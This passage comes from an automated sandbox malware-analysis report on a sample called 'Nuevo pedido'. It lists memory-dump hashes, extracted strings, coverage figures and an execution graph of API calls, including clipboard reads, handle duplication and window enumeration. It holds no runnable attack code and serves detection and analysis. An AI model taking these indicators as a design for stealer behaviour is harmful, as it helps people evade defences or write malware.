                                                                                                                                            • Instruction Fuzzy Hash: 9F210471508304EFDB05DF94D9C0B26BBA5FB84318F20C66DE8095B2A6C336D896CB61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
                                                                                                                                            • Instruction ID: 4264615849dba07012dc3fa4310b32f6292a914cf635cf810bab46e223366690
                                                                                                                                            • Opcode Fuzzy Hash: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
                                                                                                                                            • Instruction Fuzzy Hash: C821F271608200DFDB14DF54D984B26BBA6EB84318F20C569D84E5B296C33AD887CB61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
                                                                                                                                            • Instruction ID: a09051e606c65a65067a9dda346b4b4d7f5621bfba1858ff9f82c2c28fe02721
                                                                                                                                            • Opcode Fuzzy Hash: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
                                                                                                                                            • Instruction Fuzzy Hash: 8821837550D3808FC702CF24D994715BF71EB46314F28C5DAD8498F6A7C33A984ACB62
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1727367403.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_bbd000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction ID: d2c74870ce2813ff94bbfea8f1777ad0db8d64a4f1ed8cf2bfdf797882e0cb07
                                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction Fuzzy Hash: C4110372504240CFCB02CF00D5C4B66BFB1FB94324F24C6A9D8090B356C37AE85ACBA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction ID: d1dfb7d06571bcab76e5352e397086b29a1ba23414d8f9e289e7682a73e1d4af
                                                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction Fuzzy Hash: BB11BB75508280DFCB02CF94C9C4B15BBA1FB84318F24C6AAD8494B6A6C33AD85ACB61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: XK$,0
                                                                                                                                            • API String ID: 0-3597542875
                                                                                                                                            • Opcode ID: 66afbe3cf8eb70159eed4ced61455a21ba9382be363eeac5cd521da554763294
                                                                                                                                            • Instruction ID: 7994d323fd9b0ac2bd32c98d284878b2c9061cfd05d129254df9419d5336f3c9
                                                                                                                                            • Opcode Fuzzy Hash: 66afbe3cf8eb70159eed4ced61455a21ba9382be363eeac5cd521da554763294
                                                                                                                                            • Instruction Fuzzy Hash: 9951D17292569AEFDB48CF64F08A018BFB3FF89344F2CC495C0859A298DF758A60C745
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: XK$,0
                                                                                                                                            • API String ID: 0-3597542875
                                                                                                                                            • Opcode ID: f4fd5ec1cff50a08fb0e6410d690592aa1c94d924a390d968d0c95fa8da5811a
                                                                                                                                            • Instruction ID: 9c71e722708b82acbf79c3b012d4ebfd9d61e1898e643ce5e281d3f11c5c0426
                                                                                                                                            • Opcode Fuzzy Hash: f4fd5ec1cff50a08fb0e6410d690592aa1c94d924a390d968d0c95fa8da5811a
                                                                                                                                            • Instruction Fuzzy Hash: 1551F47392569AEFDB88CF54F08A018BFB3FB89341F2CC495C0859A288DF758A60C745
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: O5>M
                                                                                                                                            • API String ID: 0-2302383708
                                                                                                                                            • Opcode ID: 02c9a2070ae2240ae26012486d3e40c38f54508bfd8a072be4944f8cf00a3ac1
                                                                                                                                            • Instruction ID: fa1e3b01d2853c6403bc8b05418d961e7436037002fb7314840d179b592b02d2
                                                                                                                                            • Opcode Fuzzy Hash: 02c9a2070ae2240ae26012486d3e40c38f54508bfd8a072be4944f8cf00a3ac1
                                                                                                                                            • Instruction Fuzzy Hash: F0B117B1E15229DFDB44CFAAD98089EFBB2FF88300F24D52AD415EB255D73099418FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: O5>M
                                                                                                                                            • API String ID: 0-2302383708
                                                                                                                                            • Opcode ID: fe944277e4bcb559caa1a8c57f8376d28e25c9da07891ea0088a1f3805d7c2fa
                                                                                                                                            • Instruction ID: 176a5f561b0d7d51dd69c327a4c68078b315b99c1bd56d04d978cfe214c3d16c
                                                                                                                                            • Opcode Fuzzy Hash: fe944277e4bcb559caa1a8c57f8376d28e25c9da07891ea0088a1f3805d7c2fa
                                                                                                                                            • Instruction Fuzzy Hash: 4AB13871E152199FDB44CFAAD98089EFBF2FF89300F24D52AD415EB254D73099018FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: nlh_
                                                                                                                                            • API String ID: 0-3984638114
                                                                                                                                            • Opcode ID: 8f9bbe18445793d5c519369f3665d1e316919129db0f47379a58f0ca00110797
                                                                                                                                            • Instruction ID: e3b5689875290db4b0a7a74751c0adab20602abb6614c12aad3060ef9b0919dc
                                                                                                                                            • Opcode Fuzzy Hash: 8f9bbe18445793d5c519369f3665d1e316919129db0f47379a58f0ca00110797
                                                                                                                                            • Instruction Fuzzy Hash: 09515D75E15219DFCB48CFEAE4855AEFBF2AF88300F10942AE415B7254D7385A41CF90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: nlh_
                                                                                                                                            • API String ID: 0-3984638114
                                                                                                                                            • Opcode ID: ee00df8664263cbe39a6854fe58d776d3417d92e1a19ca652b3038f40dbe6b00
                                                                                                                                            • Instruction ID: 1d59a2a3e44f7f6e7c25326dd1292c32b9b29ccb09a8831fb499ea92bc2ab7d6
                                                                                                                                            • Opcode Fuzzy Hash: ee00df8664263cbe39a6854fe58d776d3417d92e1a19ca652b3038f40dbe6b00
                                                                                                                                            • Instruction Fuzzy Hash: 0A514D75E15219CFCB84CFEAD5855AEFBF2AF88304F10942AE416B7254D7349A41CF90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: f:
                                                                                                                                            • API String ID: 0-2393945263
                                                                                                                                            • Opcode ID: 509cd7b05d78cfadc179dd24d2b5f89608a0aa802c6ab79482b98bf8c0fa6f92
                                                                                                                                            • Instruction ID: 09631e671766d053469ace352b673141c97940728b05b1da39e7c27fdbe2c9dd
                                                                                                                                            • Opcode Fuzzy Hash: 509cd7b05d78cfadc179dd24d2b5f89608a0aa802c6ab79482b98bf8c0fa6f92
                                                                                                                                            • Instruction Fuzzy Hash: 7241F4B2E0521A9FDB48DFAAC8415AEFBB2BF88300F24D52AC415A7254D7349A41CF95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: f:
                                                                                                                                            • API String ID: 0-2393945263
                                                                                                                                            • Opcode ID: 389378c297845183b3fc6dcd7cac9ccdb97a665c08fb117e70848878dc15d4ea
                                                                                                                                            • Instruction ID: 97034e01564a843c600446fecc4747853af5df3460e183720ce9aca04ac1329f
                                                                                                                                            • Opcode Fuzzy Hash: 389378c297845183b3fc6dcd7cac9ccdb97a665c08fb117e70848878dc15d4ea
                                                                                                                                            • Instruction Fuzzy Hash: FC4116B1E0121A9FDB88CFAAC8815AEFBF2FF88300F14D52AC415A7254D7349A41CF95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 83b39f383dc6957b4945493a4766d4bfdedd16a1b18d6db42e0f987dba75782e
                                                                                                                                            • Instruction ID: d7a11544203f1124a9c050c6584164f2df362cb1d4fdf811a003539ef3baa247
                                                                                                                                            • Opcode Fuzzy Hash: 83b39f383dc6957b4945493a4766d4bfdedd16a1b18d6db42e0f987dba75782e
                                                                                                                                            • Instruction Fuzzy Hash: D1E11C74E042298FDB14DFA9D5809AEFBF2FF89304F249169E414AB356D730A941CFA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e2e47a2d826323af39b0c3f3fc216a4f5282df92ffd774317055a2f2f626b843
                                                                                                                                            • Instruction ID: f49c3e2cc7882526c2f668298593f174e73d213e2f390bdaa5bef5c0b860c4f9
                                                                                                                                            • Opcode Fuzzy Hash: e2e47a2d826323af39b0c3f3fc216a4f5282df92ffd774317055a2f2f626b843
                                                                                                                                            • Instruction Fuzzy Hash: F7E11C74E002198FCB54DFA9D5809AEFBF2FF89304F249169E414AB356DB31A981CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 427001a84de15e982df993f35d508e2790edf16ea28cfcc32b0b95481edb408e
                                                                                                                                            • Instruction ID: 512d7d4caf0869169a1e23eeec6849d726eae3b456e65a051af4e90b8655d341
                                                                                                                                            • Opcode Fuzzy Hash: 427001a84de15e982df993f35d508e2790edf16ea28cfcc32b0b95481edb408e
                                                                                                                                            • Instruction Fuzzy Hash: DAE1FB74E002198FDB14DFA9D5809AEFBF2FF89304F249169E414AB356D731A981CFA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8856842dcf2813c0a4b0464e38b6de9f4d391a959430da05929539e34313e79f
                                                                                                                                            • Instruction ID: 7d083edbfb906e6987349a6ea7b117d94ffe2a96f6a5d01af51c13bc28b5bbc8
                                                                                                                                            • Opcode Fuzzy Hash: 8856842dcf2813c0a4b0464e38b6de9f4d391a959430da05929539e34313e79f
                                                                                                                                            • Instruction Fuzzy Hash: 95E1FC74E006198FCB14DFA9D5809AEFBF2FF89304F249169E418AB356D731A981CF60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d9d2c5873f2c51d5a3508b8dac76532620822e2d9526451a00a6180e0b9828ab
                                                                                                                                            • Instruction ID: 5dc04bc937bb29f98e70d9d6727700625618c680fc82452bf36138d7c7d76bb2
                                                                                                                                            • Opcode Fuzzy Hash: d9d2c5873f2c51d5a3508b8dac76532620822e2d9526451a00a6180e0b9828ab
                                                                                                                                            • Instruction Fuzzy Hash: 8FE1FA74E0121A8FCB54DFA9D5809AEFBF2FF89304F249169E414AB356D730A941CFA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5a0f93e94dd0abc1d72450278bd3e09ead297c9ed7cc33529fab623b3d2adc81
                                                                                                                                            • Instruction ID: b3b6839d043c2ee348781c81f0ad10c89a48ac08264b574baf4e5dc9008c662e
                                                                                                                                            • Opcode Fuzzy Hash: 5a0f93e94dd0abc1d72450278bd3e09ead297c9ed7cc33529fab623b3d2adc81
                                                                                                                                            • Instruction Fuzzy Hash: 00A17E32E002258FCF05DFB4C84459EFBB2FF86314B25856AE805AB265DBB1E955CF81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 79d7466227572f6cc65c0920171f97695b6e1f312c62a68b746bb95d0e827161
                                                                                                                                            • Instruction ID: ca26c287de452a8a95c9a91cf8c55aa018b03bce09dc512faa1cf6542c276c5c
                                                                                                                                            • Opcode Fuzzy Hash: 79d7466227572f6cc65c0920171f97695b6e1f312c62a68b746bb95d0e827161
                                                                                                                                            • Instruction Fuzzy Hash: B181D275E15219CFCB44CFA9D58499EFBF2FF88210F14956AD419AB320D330AA46CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 75fde6871585b26eb28c7b20d58b252b1364d7cd6654da35717413b4b84c8ff8
                                                                                                                                            • Instruction ID: 9543ec51dfb77d184f949c0627e3054e0603e853b2473d3fba352dbe32420863
                                                                                                                                            • Opcode Fuzzy Hash: 75fde6871585b26eb28c7b20d58b252b1364d7cd6654da35717413b4b84c8ff8
                                                                                                                                            • Instruction Fuzzy Hash: F481C175A1521ACFCB44CFA9D58499EFBF2FF88210F149566D419AB320D730EA42CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 18fa26650d65e4874d15c9f5d47d6457564766ca7820123199ccf755efb605ac
                                                                                                                                            • Instruction ID: bd0010b19761ef626423d6b59ee6b44f9c27907f7a510d4e7573f1c0acb7ee4c
                                                                                                                                            • Opcode Fuzzy Hash: 18fa26650d65e4874d15c9f5d47d6457564766ca7820123199ccf755efb605ac
                                                                                                                                            • Instruction Fuzzy Hash: A56116B5E042199FDB44CFAAD5815AEFBB2FF89300F14945AD425B7204D734AA82CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a939c4c5dae2a1b1f8504323bee5d4a5124268cfee56ff65fdeb7c9fe4884bf6
                                                                                                                                            • Instruction ID: d4089f4b3b21957b59bb882e4833f524b9b88bc2b0da707eadb7040ce67604eb
                                                                                                                                            • Opcode Fuzzy Hash: a939c4c5dae2a1b1f8504323bee5d4a5124268cfee56ff65fdeb7c9fe4884bf6
                                                                                                                                            • Instruction Fuzzy Hash: 675139B1E0421A9FDB44CFAAD5816AEFBB2FF89300F14D466D415B7214D734AA82CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5351853755402e16a3e80dccdab3f629581eac7f4790cbae48520453db8916c8
                                                                                                                                            • Instruction ID: 5f188e56a0784a2f91b5137451ad5435b16fc2a4d777478dccf386d955bfbbbe
                                                                                                                                            • Opcode Fuzzy Hash: 5351853755402e16a3e80dccdab3f629581eac7f4790cbae48520453db8916c8
                                                                                                                                            • Instruction Fuzzy Hash: 0A512A70E0521A8FDB14CFA9D5805AEBBF2FF89304F24C1AAD418AB356D7319941CFA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: be516310da1503f2393d1b998098aa908a48641850334f46bd050125f184d279
                                                                                                                                            • Instruction ID: 4b754a65cd8e02d0cad0a268cf35daa50c6396b7610f676760ce41ec2e7b4f58
                                                                                                                                            • Opcode Fuzzy Hash: be516310da1503f2393d1b998098aa908a48641850334f46bd050125f184d279
                                                                                                                                            • Instruction Fuzzy Hash: 0151E974E0021A8BDB14DFAAD5805AEFBF2FF89304F24D169E418A7316D7319941CFA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a7b0536f70abadd87de430e10772c447b344d76a5a7be799b8b65c5ff3a56e50
                                                                                                                                            • Instruction ID: c564db3c7b3eff6b6072a9b970f3ea75d91e19f9f6075694f2ea4b886d519665
                                                                                                                                            • Opcode Fuzzy Hash: a7b0536f70abadd87de430e10772c447b344d76a5a7be799b8b65c5ff3a56e50
                                                                                                                                            • Instruction Fuzzy Hash: A9415B70E01119EFDB84CFA9C9809AEFBB2FF84340F24D5A9C405A7255EB309A41CF90

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:13.5%
                                                                                                                                            Dynamic/Decrypted Code Coverage:94.4%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:124
                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                            execution_graph 30285 6d88f58 30286 6d88f9e 30285->30286 30290 6d89138 30286->30290 30293 6d89128 30286->30293 30287 6d8908b 30296 6d87fcc 30290->30296 30294 6d89166 30293->30294 30295 6d87fcc DuplicateHandle 30293->30295 30294->30287 30295->30294 30297 6d891a0 DuplicateHandle 30296->30297 30298 6d89166 30297->30298 30298->30287 30443 6d89748 30444 6d8974b 30443->30444 30445 6d88e50 OleInitialize 30444->30445 30446 6d8977a 30445->30446 30299 7371033 30300 7371055 30299->30300 30301 737104c 30299->30301 30304 15cd01f 30301->30304 30308 15cd006 30301->30308 30305 15cd048 30304->30305 30306 15cd066 30305->30306 30312 73715f3 30305->30312 30306->30300 30309 15cd01f 30308->30309 30310 15cd066 30309->30310 30311 73715f3 OleGetClipboard 30309->30311 30310->30300 30311->30309 30316 7371620 30312->30316 30321 737161b 30312->30321 30313 7371606 30313->30305 30318 7371628 30316->30318 30317 737163c 30317->30313 30318->30317 30326 737168b 30318->30326 30319 7371651 30319->30313 30322 7371620 30321->30322 30323 737163c 30322->30323 30325 737168b OleGetClipboard 30322->30325 30323->30313 30324 7371651 30324->30313 30325->30324 30327 737169b 30326->30327 30330 737171b 30326->30330 30336 7371728 30326->30336 30327->30319 30331 7371728 30330->30331 30333 7371759 30331->30333 30342 7371833 30331->30342 30346 7371840 30331->30346 30332 7371777 30332->30327 30333->30327 30337 7371740 30336->30337 30339 7371759 30337->30339 30340 7371833 OleGetClipboard 30337->30340 30341 7371840 OleGetClipboard 30337->30341 30338 7371777 30338->30327 30339->30327 30340->30338 30341->30338 30344 7371840 30342->30344 30345 737187b 30344->30345 30350 73714a4 30344->30350 30345->30332 30348 7371855 30346->30348 30347 73714a4 OleGetClipboard 30347->30348 30348->30347 30349 737187b 30348->30349 30349->30332 30351 73718e8 OleGetClipboard 30350->30351 30353 7371982 30351->30353 30354 6d8b370 30355 6d8b394 30354->30355 30363 6d8991c MessageBoxW 30354->30363 30359 6d88e50 30355->30359 30358 6d8b3aa 30360 6d88e5b 30359->30360 30362 6d89c61 30360->30362 30364 6d88f34 30360->30364 30362->30358 30363->30355 30365 6d88f3f 30364->30365 30366 6d89f9b 30365->30366 30368 6d89828 30365->30368 30366->30362 30369 6d89fd0 OleInitialize 30368->30369 30370 6d8a034 30369->30370 30370->30366 30371 73700bd 30373 73700ca 30371->30373 30372 73700f2 30373->30372 30376 7370fa3 DispatchMessageW 30373->30376 30378 7370fa8 DispatchMessageW 30373->30378 30377 7371014 30376->30377 30377->30373 30379 7371014 30378->30379 30379->30373 30380 2f7e018 30381 2f7e024 30380->30381 30382 2f7e0ae 30381->30382 30384 6d854a1 30381->30384 30385 6d854b2 30384->30385 30391 6d855bd 30385->30391 30396 6d85682 30385->30396 30401 6d85520 30385->30401 30406 6d85510 30385->30406 30386 6d854e2 30386->30382 30392 6d855c4 30391->30392 30411 6d87fd8 30392->30411 30415 6d88000 30392->30415 30393 6d8573d 30393->30386 30397 6d85689 30396->30397 30399 6d87fd8 MessageBoxW 30397->30399 30400 6d88000 MessageBoxW 30397->30400 30398 6d8573d 30398->30386 30399->30398 30400->30398 30402 6d8554d 30401->30402 30404 6d87fd8 MessageBoxW 30402->30404 30405 6d88000 MessageBoxW 30402->30405 30403 6d8573d 30403->30386 30404->30403 30405->30403 30407 6d8554d 30406->30407 30409 6d87fd8 MessageBoxW 30407->30409 30410 6d88000 MessageBoxW 30407->30410 30408 6d8573d 30408->30386 30409->30408 30410->30408 30412 6d87fdd 30411->30412 30414 6d88245 30412->30414 30419 6d87d8c 30412->30419 30414->30393 30416 6d88063 30415->30416 30417 6d87d8c MessageBoxW 30416->30417 30418 6d88245 30416->30418 30417->30418 30418->30393 30420 6d8b210 MessageBoxW 30419->30420 30422 6d8b28f 30420->30422 30422->30414 30423 6d897b7 30426 6d88e60 30423->30426 30427 6d88e6b 30426->30427 30431 6d8ad90 30427->30431 30435 6d8ad81 30427->30435 30428 6d897c4 30432 6d8addf 30431->30432 30439 6d89894 30432->30439 30436 6d8ad90 30435->30436 30437 6d89894 EnumThreadWindows 30436->30437 30438 6d8ae60 30437->30438 30438->30428 30441 6d8ae80 EnumThreadWindows 30439->30441 30442 6d8ae60 30441->30442 30442->30428

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
